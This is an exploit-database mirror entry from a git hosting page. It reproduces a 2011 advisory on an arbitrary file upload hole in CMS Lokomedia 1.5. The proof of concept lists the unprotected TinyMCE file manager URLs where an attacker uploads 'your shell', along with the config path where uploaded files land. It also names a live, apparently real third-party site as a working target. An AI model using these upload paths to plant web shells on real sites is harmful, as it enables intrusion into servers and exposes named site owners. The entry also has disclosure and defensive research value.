bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/17014.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

58 lines
No EOL
2.1 KiB
Text
Raw Blame History

===================================================================
CMS Lokomedia 1.5 Arbitary file upload vulnerability
===================================================================
Software: CMS Lokomedia
Vendor: http://bukulokomedia.com/home
Vuln Type: Arbitary file upload
Download link: http://bukulokomedia.com/lokomedia-1.5.rar
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
DORK: use your skill and play your imagination :P
Gratz:
- Kuris : status udah merit aja beib.. kgak undang² iks..
- Richie : RebelgiRL (Limited edition.. lol) live is never flate so enjoy this live mate ^_^
References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
===================================================================
----------------------------------
exploit & p0c
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html // upload your file here
or
[!] http://host/tinymcpuk/filemanager/browser.html
or
[!] http://host//tinymcpuk/filemanager/frmupload.html
or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
your shell or file will be placed here
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash) */
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ; // <= here
/*==============================================================================*/
/* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */ // <= or here
----------------------------------
live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
Reference in a new issue View git blame Copy permalink